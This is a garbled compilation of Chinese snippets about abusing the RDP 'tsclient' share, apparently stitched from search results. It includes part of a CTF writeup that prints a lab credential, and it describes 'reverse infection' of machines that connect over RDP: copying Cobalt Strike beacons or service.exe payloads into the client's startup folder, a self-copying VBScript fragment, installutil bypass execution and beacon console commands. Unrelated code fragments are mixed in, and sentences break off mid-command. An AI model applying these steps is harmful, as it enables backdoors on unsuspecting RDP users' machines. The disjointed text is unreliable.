Ichunqiu云境 —— Tsclient Writeup Author:小离-xiaoli 0x1 Info • Tag: MSSQL,Privilege Escalation,Kerberos,域渗透 使用john的token执行 net use 看到 \\tsclient\C 共享 7. 直接获取 \\tsclient\C 下面的 credential.txt,同时提示 hijack image (镜像劫持) xiaorang.lab\Aldrich:Ald@rLMWuy7Z!
然后通过以下格式的命令便可以在远程主机上访问连接他的客户端主机了: dir \\tsclient\c # 列出连接远程主机的本机 C 盘目录copy file \\tsclient\c # 将文件复制到连接远程主机的本机中# \\tsclient\盘符 如下图,我们使用 “tsclient” 列出了客户端主机上的 C 盘目录: image-20210712213922868 如下图所示,我们使用 协议,但是使用 tsclient 无需进行身份认证。 但要注意的是,只有通过远程登陆的用户才可以在远程主机中访问 tsclient,其他在远程主机上本地登录的用户是无论如何也无法访问 tsclient 的。 start.bat 脚本执行后会首先遍历 tsclient 共享,发现 tsclient 共享后就会将自己复制到 tsclient 也就是连接远程主机的客户端主机上的启动项中,然后执行一个 Cobalt
1、tsclient 反向感染 a、原理 tsclient 是通过远程桌面连接到远程计算机时,在远程计算机“网上邻居”中出现的一个机器名,实际为远程计算机分配给本机的名称。 ? 通过\\tsclient\盘符可以在远程计算机上访问本机。 其访问方式类似于使用 smb 进行文件传输,虽然本质上都是 smb 协议,但是使用 tsclient 无需身份认证,因此可以直接将通过预制手段,使用 tsclient 反向感染。 使用登录用户执行dir \\tsclient\c命令,可以正常访问。 ? 使用其他用户执行命令无法访问,包括使用 runas: ? 因此,想使用 tsclient 进行信息收集也相对困难。 c、限制条件 首先,与 tsclient 类似,mstsc 需要开启剪切板。但是与 tsclient 不同,在 mstsc 中剪切板是默认开启的。
3.1 远程登录的机器主动勾选磁盘分享 在当前vps的网络里面是可以看到当前win10的机器的,叫做tsclient: image.png 但是我们目前是无法获取到win10机器的任何信息的,因为没有开启任何的真正意义上的共享 7fygf30ac93e0318 当我们没有远程的时候,我们看下vps的进程表: image.png 在这里除了正常的进程之外,还有一个我们的beacon.exe进程,等对方3389到这台vps之后看下: dir \\tsclient image.png 其实从这里,就可以用基础的Windows命令搞事了,比如你可以把cs马直接移动到他的pc上去: shell copy C:\Users\crow\Desktop\beacon.exe \\tsclient
当 A 远程登陆到 B 机器时,如果选择将 A 的 C 盘共享到远程主机,那么在此次会话中就出现了一个名为 tsclient 的共享指向主机 A 共享的磁盘。 objFSO.GetFile(Wscript.scriptfullname).copy(sufile) End If '查看远程机器的用户目录 Set tsdir=objFSO.GetFolder("\\tsclient
6.使用installutil.exe执行bypass.exe set-location \\tsclient\lkylabs copy-item .
/example.protomvclient/src/example_pb.jsclient/src/proto/2>/dev/null||truemvclient/src/example_pb.d.tsclient truemvclient/src/example_grpc_web_pb.jsclient/src/proto/2>/dev/null||truemvclient/src/example_grpc_web_pb.d.tsclient
service.exe",0 (2)Windows.bat 脚本内容实现马(service.exe)拷贝到客户端的启动目录 copy "C:\Windows\Temp\service.exe" "\\tsclient
65:在Windows Server 2003系统中,终端服务客户端软件文件位于Winodws系统文件夹的(system32\clients\tsclient\win32 )。
下面分别看下生成的四个文件 tsclient.go type Client interface { // See https://microsoft.github.io/language-server-protocol
1012 rdpclip.exe x64 3 EXT\super.admin beacon> inject 4960 x64 tcp-local # There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP. ## \\tsclient\c is the C: drive on the origin machine of the RDP session beacon> ls \\tsclient\c Size Type Last Modified Name ---- - dir 10/18/2016 01:59:39 Documents and Settings [...] # Upload backdoor to startup folder beacon> cd \\tsclient